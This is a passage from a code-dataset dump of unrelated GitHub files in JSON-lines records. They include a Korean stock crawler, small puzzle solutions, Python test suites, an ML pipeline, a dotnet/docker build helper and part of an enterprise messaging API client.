HYUNDAI_data_realTime.replace(\",\",\"\")\r\nHYUNDAI_data_realTime_int = int(HYUNDAI_data_realTime_result)\r\nprint(HYUNDAI_data_realTime_int)\r\nprint(HYUNDAI_data_realTime)\r\n\r\n# NAVER\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=035420\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nNAVER_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nNAVER_data_first = NAVER_data.find(\"span\", {\"class\": \"blind\"})\r\nNAVER_data_realTime = NAVER_data_first.text # 실시간 가격\r\nNAVER_data_realTime_result = NAVER_data_realTime.replace(\",\",\"\")\r\nNAVER_data_realTime_int = int(NAVER_data_realTime_result)\r\nprint(NAVER_data_realTime_int)\r\nprint(NAVER_data_realTime)\r\n\r\n#LGD\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=034220\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nLGD_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nLGD_data_first = LGD_data.find(\"span\", {\"class\": \"blind\"})\r\nLGD_data_realTime = LGD_data_first.text # 실시간 가격\r\nLGD_data_realTime_result = LGD_data_realTime.replace(\",\",\"\")\r\nLGD_data_realTime_int = 
int(LGD_data_realTime_result)\r\nprint(LGD_data_realTime_int)\r\nprint(LGD_data_realTime)\r\n\r\ntry:\r\n    with conn.cursor() as cursor:\r\n        # CJ 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (CJ_data_realTime_int, 'CJ'))\r\n\r\n        # LG 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (LG_data_realTime_int, 'LG'))\r\n\r\n        # SK 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (SK_data_realTime_int, 'SK'))\r\n\r\n        # DOOSAN 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (DOOSAN_data_realTime_int, '두산'))\r\n\r\n        # SAMSUNG 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (samsung_data_realTime_int, '삼성'))\r\n\r\n        # ASIANA 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (ASIANA_data_realTime_int, '아시아나항공'))\r\n\r\n        # KAKAO 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (KAKAO_data_realTime_int, '카카오'))\r\n\r\n        # HANWHA 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (HANWHA_data_realTime_int, '한화'))\r\n\r\n        # HYUNDAI 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (HYUNDAI_data_realTime_int, '현대'))\r\n\r\n        # JINRO 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (JINRO_data_realTime_int, '하이트진로'))\r\n\r\n        # NAVER 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (NAVER_data_realTime_int, '네이버'))\r\n\r\n        # LGD 디비넣기\r\n        sql = 'UPDATE company SET now = %s WHERE name = %s'\r\n        cursor.execute(sql, (LGD_data_realTime_int, 'LGD'))\r\n\r\n    conn.commit()\r\n\r\nfinally:\r\n    conn.close()\r\n","repo_name":"geniuses777/SPF","sub_path":"최종코드/이가현/company_now.py","file_name":"company_now.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74593137106","text":"import random\n\nnumber = int(input('Guess a number between 1 and 10\\n')) # cast to int so the comparison with x works\n\nx = random.randint(1, 10) # randint is inclusive on both ends, so the upper bound is 10\n\nif x == number:\n    print(\"You guessed right\")\nelse: \n    print(\"You guessed incorrectly\")\n    print(\"The number was:\", x)\n\n","repo_name":"adrian2002h/Number-Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16864450381","text":"# project\nfrom dephell.controllers import Graph, Mutator, Resolver, analyze_conflict\n\n# app\nfrom ..helpers import Fake, make_root\n\n\ndef merge(*roots, merged=True, deps=None):\n    graph = Graph()\n    for root in roots:\n        graph.add(root)\n    resolver = Resolver(graph=graph, mutator=Mutator())\n    resolved = resolver.resolve(level=1)\n\n    try:\n        assert merged == resolved\n    except AssertionError:\n        if resolved is False:\n            print(analyze_conflict(resolver=resolver))\n        raise\n\n    if deps:\n        for dep in deps:\n            assert dep in resolver.graph\n        names = set(resolver.graph.names) - {root.name for root in roots}\n        assert names == set(deps)\n\n    return resolver\n\n\ndef test_simple_merge():\n    root1 = make_root(\n        root=Fake('', 'a', 'b'),\n        a=(Fake('1.0'), ),\n        b=(Fake('1.0'), ),\n    )\n    root2 = make_root(\n        root=Fake('', 'c', 'd'),\n        c=(Fake('1.0'), ),\n        d=(Fake('1.0'), ),\n    )\n    merge(root1, root2, deps=('a', 'b', 'c', 'd'))\n\n\ndef test_merge_with_common_dep():\n    root1 = make_root(\n        root=Fake('', 'a', 
'b'),\n a=(Fake('1.0'), ),\n b=(Fake('1.0'), ),\n )\n root2 = make_root(\n root=Fake('', 'b', 'c'),\n b=(Fake('1.0'), ),\n c=(Fake('1.0'), ),\n )\n merge(root1, root2, deps=('a', 'b', 'c'))\n\n\ndef test_merge_with_constraint():\n root1 = make_root(\n root=Fake('', 'a', 'b>=1.0'),\n a=(Fake('1.0'), ),\n b=(Fake('1.0'), Fake('2.0')),\n )\n root2 = make_root(\n root=Fake('', 'b<2.0', 'c'),\n b=(Fake('1.0'), Fake('2.0')),\n c=(Fake('1.0'), ),\n )\n resolver = merge(root1, root2, deps=('a', 'b', 'c'))\n constraint = str(resolver.graph.get('b').constraint)\n assert constraint == '<2.0,>=1.0'\n\n\ndef test_merge_conflict():\n root1 = make_root(\n root=Fake('', 'a', 'b<=1.0'),\n a=(Fake('1.0'), ),\n b=(Fake('1.0'), Fake('2.0')),\n )\n root2 = make_root(\n root=Fake('', 'b>=2.0', 'c'),\n b=(Fake('1.0'), Fake('2.0')),\n c=(Fake('1.0'), ),\n )\n resolver = merge(root1, root2, merged=False)\n assert resolver.graph.conflict.name == 'b'\n","repo_name":"dephell/dephell","sub_path":"tests/test_resolving/test_merging.py","file_name":"test_merging.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"13016316670","text":"import json\nimport logging\n\nfrom faker import Faker\n\nimport pubsub\nfrom settings import GOOGLE_PROJECT_ID, PUBSUB_TOPIC\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[logging.FileHandler(\"debug.log\"),\n logging.StreamHandler()],\n)\n\n\ndef run(project, topic):\n Faker.seed(0)\n faker = Faker()\n pubsub.get_or_create_topic(project, topic)\n id = 0\n while True:\n simple_profile = faker.simple_profile()\n simple_profile[\"id\"] = id\n id += 1\n simple_profile = json.dumps(simple_profile, default=str)\n pubsub.publish(project, topic, data=simple_profile.encode(\"utf-8\"))\n\n\nif __name__ == \"__main__\":\n run(project=GOOGLE_PROJECT_ID, topic=PUBSUB_TOPIC)\n","repo_name":"mfilipelino/cdc-event-souce-generator","sub_path":"cdc_generation.py","file_name":"cdc_generation.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23447248906","text":"from collections import deque\n\ncheck_idx = [[-1, -2, 2], [1, 2, -2]] # 체크할 톱니바퀴 idx, 비교할 내 톱니 idx, 비교할 상대의 톱니 idx\n\nvalid_range = lambda gear_idx: 0 <= gear_idx < 4\n\n\ndef solution(gears_idx, move):\n visited = [False] * 4\n que = deque()\n que.append((gears_idx, move))\n while que:\n now_gear_idx, now_move = que.popleft()\n visited[now_gear_idx] = True\n for i in range(2):\n check_gear_idx, my_gear, other_gear = check_idx[i]\n check_gear_idx += now_gear_idx\n if not valid_range(check_gear_idx):\n continue\n now_start_idx, other_start_idx = start_index[now_gear_idx], start_index[check_gear_idx]\n now_gear = now_start_idx + my_gear\n other_gear = other_start_idx + other_gear\n if not visited[check_gear_idx] and gears[now_gear_idx][now_gear % 8] != gears[check_gear_idx][other_gear % 8]:\n que.append((check_gear_idx, now_move * -1))\n if now_move == -1:\n start_index[now_gear_idx] += 1\n else:\n start_index[now_gear_idx] -= 1\n\n\ngears = [list(map(int, list(input()))) for _ in range(4)]\nstart_index = [0] * 4\nK = int(input())\nmoves = [list(map(int, input().split())) for _ in range(K)]\n\nfor move in moves:\n solution(move[0] - 1, move[1])\n\nanswer = 0\nfor i in range(4):\n answer += int(pow(2, (i+1) * gears[i][start_index[i]%8] - 
1))\nprint(answer)\n","repo_name":"JoungMinJu/PyCodingTest","sub_path":"rvd/first/BOJ_14891.py","file_name":"BOJ_14891.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43414285077","text":"import sys\nfrom collections import deque\nsys.stdin = open(\"sources/input-10.txt\", \"r\")\n\n\nwhile True:\n try:\n test_case = int(input())\n arr = deque(map(int, input().split()))\n while 0 not in arr:\n for i in range(1, 6):\n next = arr.popleft()-i\n if next <= 0:\n arr.append(0)\n break\n else:\n arr.append(next)\n print(\"#{}\".format(test_case), end=\" \")\n for i in arr:\n print(\"{}\".format(i), end=\" \")\n print()\n except:\n break\n","repo_name":"Guitarboyjason/Algorithm","sub_path":"SWExpertacademyPython/1225. 암호생성기.py","file_name":"1225. 암호생성기.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38485158659","text":"\nimport sys\nsys.path.append('.')\nfrom utils import HParam\nfrom kg_generator import *\nfrom gpt2_generator import gpt2_model_gpt2_generator, GPT2_BaseLitModel\nfrom training.util import import_class, setup_data_from_args\n\nimport argparse\nimport torch\nimport pytorch_lightning as pl\n\n\ndef main():\n parser = argparse.ArgumentParser(add_help=False)\n\n\n parser.add_argument(\"--help\", \"-h\", action=\"help\")\n parser.add_argument(\"-c\",'--config',default='config/default.yaml', type=str, help='set the config file')\n parser.add_argument(\"-m\", type=str, required= True, help='model name')\n\n args = parser.parse_args()\n hp = HParam(args.config)\n\n #kg_model = kg_model_transformer_generator(hp.kg.pretrained_file)\n kg_model = kg_model_entities_generator(hp.kg.pretrained_file,4)\n #data\n data, tokenizer= setup_data_from_args(hp)\n\n kg_module = KG_BaseLitModel(kg_model, tokenizer,args=hp.kg)\n trainer = pl.Trainer(accelerator='mps',\n devices=1,\n max_epochs=3,\n )\n \n #trainer.test(combined_module,data)\n logits = kg_module.predict(['蓝方直升机被红方载具击伤撤退,多名步兵由D6绕至D7'])\n print(logits)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Seafood-SIMIT/BattlefieldSATrainer","sub_path":"test/test_kg.py","file_name":"test_kg.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20785773729","text":"import dask\nimport pytest\nimport xarray as xr\nfrom xarray.core.utils import Frozen\nfrom xarray.testing import assert_allclose\n\nfrom climpred.bootstrap import dpp_threshold\nfrom climpred.stats import decorrelation_time, dpp\n\ntry:\n from climpred.bootstrap import varweighted_mean_period_threshold\n from climpred.stats import varweighted_mean_period\nexcept ImportError:\n pass\n\nfrom . 
import requires_xrft\n\nITERATIONS = 2\n\n\n@pytest.mark.parametrize(\"chunk\", (True, False))\ndef test_dpp(PM_ds_control_3d, chunk):\n \"\"\"Check for positive diagnostic potential predictability in NA SST.\"\"\"\n res = dpp(PM_ds_control_3d, chunk=chunk)\n assert res.mean() > 0\n\n\n@requires_xrft\n@pytest.mark.parametrize(\"func\", (varweighted_mean_period, decorrelation_time))\ndef test_potential_predictability_likely(PM_ds_control_3d, func):\n \"\"\"Check for positive diagnostic potential predictability in NA SST.\"\"\"\n res = func(PM_ds_control_3d)\n assert res.mean() > 0\n\n\ndef test_bootstrap_dpp_sig50_similar_dpp(PM_ds_control_3d):\n sig = 50\n actual = dpp_threshold(PM_ds_control_3d, iterations=ITERATIONS, sig=sig).drop_vars(\n \"quantile\"\n )\n expected = dpp(PM_ds_control_3d)\n xr.testing.assert_allclose(actual, expected, atol=0.5, rtol=0.5)\n\n\n@requires_xrft\ndef test_bootstrap_vwmp_sig50_similar_vwmp(PM_ds_control_3d):\n sig = 50\n actual = varweighted_mean_period_threshold(\n PM_ds_control_3d, iterations=ITERATIONS, sig=sig\n ).drop_vars(\"quantile\")\n expected = varweighted_mean_period(PM_ds_control_3d)\n xr.testing.assert_allclose(actual, expected, atol=2, rtol=0.5)\n\n\ndef test_bootstrap_func_multiple_sig_levels(PM_ds_control_3d):\n sig = [5, 95]\n actual = dpp_threshold(PM_ds_control_3d, iterations=ITERATIONS, sig=sig)\n assert actual[\"quantile\"].size == len(sig)\n assert (actual.isel(quantile=0) <= actual.isel(quantile=1)).to_array().all()\n\n\n@requires_xrft\n@pytest.mark.parametrize(\"step\", [1, 2, -1])\n@pytest.mark.parametrize(\n \"func\",\n [dpp, varweighted_mean_period, decorrelation_time],\n)\ndef test_stats_functions_dask_chunks(PM_ds_control_3d, func, step):\n \"\"\"Check whether selected stats functions be chunked and computed along other\n dim.\"\"\"\n dim = \"time\"\n for chunk_dim in PM_ds_control_3d.isel({dim: 0}).dims:\n control_chunked = PM_ds_control_3d.chunk({chunk_dim: step})\n res_chunked = func(control_chunked, dim=dim)\n res = func(PM_ds_control_3d, dim=dim)\n # check for chunks\n assert dask.is_dask_collection(res_chunked)\n assert res_chunked.chunks is not None\n # check for no chunks\n assert not dask.is_dask_collection(res)\n assert res.chunks == Frozen({})\n # check for identical result\n assert_allclose(res, res_chunked.compute(), atol=0.001, rtol=1e-4)\n","repo_name":"pangeo-data/climpred","sub_path":"climpred/tests/test_stats.py","file_name":"test_stats.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"48"} +{"seq_id":"44582613944","text":"import pygame as pg\nfrom SwingyMonkey import SwingyMonkey\nimport argparse\nimport matplotlib.pyplot as plt\n\nfrom SimpleNN import SimpleNNLearner, SimpleNNTrained\nfrom ReplayNN import ReplayNNLearner, ReplayNNTrained\nfrom HighGTableLearner import HighGTableLearner\nfrom HighGTableTrained import HighGTableTrained\nfrom LowGTableLearner import LowGTableLearner\nfrom LowGTableTrained import LowGTableTrained\n\n\nAGENT_DICT = {\n 'simple_nn': {True: SimpleNNLearner, False: SimpleNNTrained},\n 'replay_nn': {True: ReplayNNLearner, False: ReplayNNTrained},\n 'low_g_table': {True: LowGTableLearner, False: LowGTableTrained},\n 'high_g_table': {True: HighGTableLearner, False: HighGTableTrained}\n}\n\n\ndef run_games(agent, epochs, tick_length):\n history = []\n for epoch in range(epochs):\n # Make a new monkey object.\n swing = SwingyMonkey(sound=False,\n text=f\"Epoch {epoch}\",\n tick_length=tick_length,\n 
action_callback=agent.action_callback,\n reward_callback=agent.reward_callback)\n\n # Loop until you hit something.\n while swing.game_loop():\n pass\n\n # Save score history.\n history.append(swing.score)\n\n # Reset the state of the learner.\n agent.reset()\n\n if epoch > 0 and epoch % 100 == 0:\n print(max(history[-100:]))\n print(sum(history[-100:])/100.0)\n pg.quit()\n return history\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"agent\", help=\"Possible values: simple_nn, replay_nn, low_g_table, high_g_table\", type=str)\n parser.add_argument(\"-t\", \"--train\", help=\"True: Train new agent, False: Use saved agent\", type=bool, default=False)\n parser.add_argument(\"-e\", \"--epochs\", help=\"Number of epochs\", type=int, default=400)\n parser.add_argument(\"-tl\", \"--tick_length\", help=\"Tick length in ms\", type=int, default=50)\n args = parser.parse_args()\n\n agent = AGENT_DICT[args.agent][args.train]()\n history = run_games(agent, args.epochs, args.tick_length)\n\n fig, ax = plt.subplots()\n ax.plot(history)\n plt.show()\n","repo_name":"jonriege/P4-reinforcement-learning-exercise","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36400884728","text":"def vowel_count(phrase):\n \"\"\"Return frequency map of vowels, case-insensitive.\n\n >>> vowel_count('rithm school')\n {'i': 1, 'o': 2}\n \n >>> vowel_count('HOW ARE YOU? i am great!') \n {'o': 2, 'a': 3, 'e': 2, 'u': 1, 'i': 1}\n \"\"\"\n vowel_dict = {}\n lower_phrase = phrase.lower()\n vowels = \"aeiou\"\n for char in lower_phrase:\n if not vowels.find(char) == -1:\n vowel_dict[char] = lower_phrase.count(char)\n\n return vowel_dict\n ","repo_name":"CanonWiseman/unit_18","sub_path":"python-ds-practice/26_vowel_count/vowel_count.py","file_name":"vowel_count.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8938774259","text":"from textsummarizer.pipeline.stage_01_data_ingestion import DataIngestionTrainingPipeline\nfrom textsummarizer.pipeline.stage02_data_validation import DataValidationTrainingPipeline\nfrom textsummarizer.pipeline.stage_03_data_transformation import DataTransformationTrainingPipeline\nfrom textsummarizer.pipeline.stage04_model_training import ModelTraninerTrainingPipeline\nfrom textsummarizer.pipeline.stage05_model_evaluation import ModelEvaluationTrainingPipeline\nfrom textsummarizer.logging import logger\nimport os\nimport sys\n\n\nSTAGE_NANME=\"Data ingestion stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n data_ingestion=DataIngestionTrainingPipeline()\n data_ingestion.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\nSTAGE_NANME=\"Data Validation stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n data_validation=DataValidationTrainingPipeline()\n data_validation.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\nSTAGE_NANME=\"Data Transformation stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n data_transformation=DataTransformationTrainingPipeline()\n data_transformation.main()\n 
logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\n\n\nSTAGE_NANME=\" Model Training stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n model_trainer=ModelTraninerTrainingPipeline()\n model_trainer.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\n\nSTAGE_NANME=\" Model evaluation stage\"\ntry:\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} started <<<<<<<<<<\")\n model_evaluation=ModelEvaluationTrainingPipeline()\n model_evaluation.main()\n logger.info(f\">>>>>>>>> stage {STAGE_NANME} completed <<<<<<<<<\\n]nx============x\")\nexcept Exception as e:\n logger.exception(e)\n raise e","repo_name":"Sainath6566/TextSummarizerProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20396840018","text":"def infiltrate_firewall(delay, stealth=False):\n \"\"\" Computes the severity of infiltrating firewall given delay\n delay: ticks to wait before infiltrating\n stealth: restart if true and caught by scanner\n \"\"\"\n severity = 0\n # The depth of a layer of the firewall is how many ticks have occured\n for tick, range in firewall.items():\n if (tick + delay) % (2*range - 2) == 0:\n severity = (severity + tick*range) if not stealth else -1\n if stealth:\n break\n return severity\n\n\nfirewall = {}\nfor x in open('./Inputs/day13.txt').readlines():\n depth, r = map(int,x.split(\":\"))\n firewall[depth] = r\nprint(\"Part 1:\", infiltrate_firewall(0))\n\ndelay = 0\nwhile True:\n delay += 1\n if infiltrate_firewall(delay, True) == 0:\n break\nprint(\"Part 2:\", delay)","repo_name":"willyao94/advent-of-code-2017","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41187414298","text":"import os\nimport subprocess\nfrom subprocess import run\nimport yaml\n\nimport parser \nimport aws\n\nglobal args\n\ndef get_arguments():\n global args\n args = parser.get_arguments()\n\n#dotnet stages functions\ndef dotnet_stages(dir_path):\n if args.dotnet_clean == 'y':\n dotnet_clean()\n \n publish(args.workspace_folder + '/src/' + args.project_namespace, dir_path)\n copy_envs(args.workspace_folder, dir_path)\n\ndef dotnet_clean():\n command = ['dotnet', 'clean', get_proj_file()]\n print(command)\n\ndef publish(base_path, dir_path):\n pubish_command = ['dotnet', 'publish', base_path, '-o', dir_path+'/publish', '-c', 'release']\n run_command(pubish_command)\n\ndef copy_envs(base_path, dir_path):\n copy_runsh(base_path, dir_path)\n copy_values(base_path + '/src/main/kubernetes/dev/values.yaml', dir_path + '/env_files/env_file.env')\n\ndef copy_runsh(base_path, dir_path):\n path_runsh = base_path + '/run.sh'\n\n if os.path.exists(base_path) and args.debug_inside == 'n':\n cp_command = ['cp', path_runsh, dir_path]\n run_command(cp_command)\n else: \n print('run.sh NOT FOUND')\n\ndef copy_values(from_path, to_path):\n yaml_file = read_yaml_file(from_path)\n\n env_file = yaml_to_env(yaml_file)\n\n try:\n f = open(to_path, 'w')\n f.writelines(env_file)\n f.close()\n except:\n print('Erro ao abrir arquivo ' + to_path)\n \ndef yaml_to_env(yaml_file):\n env = ''\n\n for x in yaml_file[\"env\"]:\n env += 
str(x['name']) + '=' + str(x['value']) + '\\n'\n\n return env\n\ndef get_proj_file():\n return args.workspace_folder + '/src/' + args.project_namespace + '/' + args.project_namespace + '.csproj'\n\n#docker stages functions\ndef docker_stages(dir_path):\n docker_build(dir_path)\n docker_run(dir_path)\n stop_container()\n\ndef get_tag_arg(dotnet_version):\n if \"3.1\" in dotnet_version:\n return \"3.1.21-bionic\"\n\n if \"5.0\" in dotnet_version:\n return \"5.0.12-buster-slim\"\n\n if \"6.0\" in dotnet_version:\n return \"6.0.0-bullseye-slim\"\n\n return \"5.0.12-buster-slim\"\n\ndef docker_build(dir_path): \n tag_arg = get_tag_arg(args.dotnet_version)\n build_command = ['docker', 'build', '--tag', args.image_name, '--build-arg', f'TAG={tag_arg}', dir_path + '/.'] \n run_command(build_command)\n\ndef docker_run(dir_path):\n base_command = ['docker', 'run']\n \n if args.detach == 'y':\n print('CONTAINER ID')\n base_command.append('-d')\n\n base_command.append('-p')\n base_command.append(args.port)\n\n path_env_file_aws = dir_path + '/env_files/env_file_aws'\n path_env_file = dir_path + '/env_files/env_file.env'\n\n if os.path.exists(path_env_file_aws):\n base_command.append('--env-file')\n base_command.append(path_env_file_aws)\n\n if os.path.exists(path_env_file):\n base_command.append('--env-file')\n base_command.append(path_env_file) \n #base_command.append('-it') # usar quando conseguir debugar dentro do container\n base_command.append(args.image_name) \n run_command(base_command)\n\ndef stop_container():\n if args.detach == 'n':\n print('STOPING THE CONTAINER')\n command_stop = ['docker stop $(docker ps -q -l)']\n run_command(command_stop, shell=True)\n if args.remove == 'y':\n print('REMOVING THE CONTAINER')\n command_remove = ['docker rm $(docker ps -q -l)']\n run_command(command_remove, shell=True)\n else:\n print('RUNNING CONTAINER IN DETACH MODE\\n' + 'Type \"docker ps\" to see the container info')\n\ndef read_yaml_file(dir_path):\n try:\n f = open(dir_path)\n y = yaml.load(f, Loader=yaml.FullLoader)\n f.close()\n return y\n except:\n print('Erro ao abrir arquivo ' + dir_path)\n return ''\n\ndef run_command(command, shell=False): \n print(f\"\\n{' '.join(command)}\\n\") \n try:\n result_command = run(command, universal_newlines=True, shell=shell, check=True)\n print(result_command) \n except KeyboardInterrupt as err:\n print('\\nCOMANDO CANCELADO')\n except Exception as ex:\n print('ERRO AO EXECUTAR COMANDO:', ex)\n raise\n\n#aws functions\ndef get_credentials(dir_path):\n command = aws.getCredentialsCommand(dir_path)\n run_command(command, shell=True)\n\ndef main():\n get_arguments()\n dir_path = os.path.dirname(os.path.realpath(__file__))\n \n if not os.path.exists(dir_path + '/env_files'):\n os.mkdir(dir_path + '/env_files')\n\n if not os.path.exists(dir_path + '/certs'):\n os.mkdir(dir_path + '/certs')\n\n if args.aws == 'y':\n get_credentials(dir_path + '/env_files/env_file_aws')\n\n dotnet_stages(dir_path)\n \n docker_stages(dir_path)\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"mayconbj15/docker_locally","sub_path":"dotnet_docker.py","file_name":"dotnet_docker.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4115389059","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n主动调用接口\n\"\"\"\n\nimport json\nimport time\nfrom os.path import join, abspath\n\nimport requests\nfrom requests_toolbelt import MultipartEncoder\n\nfrom .api import *\nfrom entapp.aes import 
AESCrypto\nfrom entapp.error import *\nfrom entapp.message import Message\nfrom entapp.utils import *\n\n\nFILE_TYPE_FILE = 'file'\nFILE_TYPE_IMAGE = 'image'\n\n\nclass AppClient(object):\n \"\"\"\n 企业应用主动调用接口客户端\n \"\"\"\n\n def __init__(self, buin, app_id, aes_key, address):\n \"\"\"\n 构造函数\n :param buin: 企业总机号\n :param app_id: AppId\n :param aes_key: encodingaeskey\n :param address: 有度服务器地址(IP:PORT)\n\n :type buin: int\n :type app_id: unicode or str\n :type aes_key: unicode or str\n :type address: unicode or str\n \"\"\"\n check_type(buin, int)\n check_types(app_id, unicode_str(), str)\n check_types(aes_key, unicode_str(), str)\n check_types(address, unicode_str(), str)\n self.__buin = buin\n self.__app_id = pystr(app_id)\n self.__address = pystr(address)\n self.__crypto = AESCrypto(app_id, aes_key)\n self.__token_info = None\n\n @property\n def buin(self):\n \"\"\"\n 企业总机号\n :rtype: int\n \"\"\"\n return self.__buin\n\n @property\n def app_id(self):\n \"\"\"\n AppId\n :rtype: str\n \"\"\"\n return self.__app_id\n\n @property\n def address(self):\n \"\"\"\n 有度服务器地址(IP:PORT)\n :rtype: str\n \"\"\"\n return self.__address\n\n def __check_and_refresh_token(self):\n \"\"\"\n 检查token,不存在或者过期则取获取一次token\n \"\"\"\n now = int(time.time())\n if self.__token_info is None or self.__token_info[1] + self.__token_info[2] < now:\n token_url = '{scheme}{address}{uri}'.format(\n scheme=SCHEME, address=self.__address, uri=API_GET_TOKEN)\n access_token, expire_in = _get_token(self.__buin, self.__app_id, token_url, self.__crypto)\n self.__token_info = (access_token, expire_in, now)\n\n def send_msg(self, msg):\n \"\"\"\n 发送消息\n :param msg: 消息对象\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type msg: Message\n \"\"\"\n check_type(msg, Message)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_SEND_MSG, self.__token_info[0])\n _send_msg(self.__buin, self.__app_id, url, self.__crypto, msg)\n\n def upload_file(self, file_type, file_name, file_path):\n \"\"\"\n 上传文件\n :param file_type: 文件类型\n :param file_name: 文件名称\n :param file_path: 文件路径\n :return: 资源Id\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 读文件错误\n\n :type file_type: str\n :type file_name: unicode or str\n :type file_path: unicode or str\n :rtype: str\n \"\"\"\n check_type(file_type, str)\n check_types(file_name, unicode_str(), str)\n check_types(file_path, unicode_str(), str)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_UPLOAD_FILE, self.__token_info[0])\n return _upload_file(self.__buin, self.__app_id, url, self.__crypto, file_type, pystr(file_name), pystr(file_path))\n\n def download_file(self, media_id, out_dir):\n \"\"\"\n 下载文件\n :param media_id: 资源Id\n :param out_dir: 输出文件的目录\n :return: (name: 文件名称, size: 文件大小,单位:字节, content: 文件内容)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 写文件错误\n\n :type media_id: unicode or str\n :type out_dir: unicode or str\n :rtype: (str, int, bytes)\n \"\"\"\n check_types(media_id, unicode_str(), str)\n check_types(out_dir, unicode_str(), str)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_DOWNLOAD_FILE, self.__token_info[0])\n return _download_file(self.__buin, self.__app_id, url, self.__crypto, pystr(media_id), pystr(out_dir))\n\n def search_file(self, media_id):\n \"\"\"\n 搜索文件信息\n :param media_id: 资源Id\n 
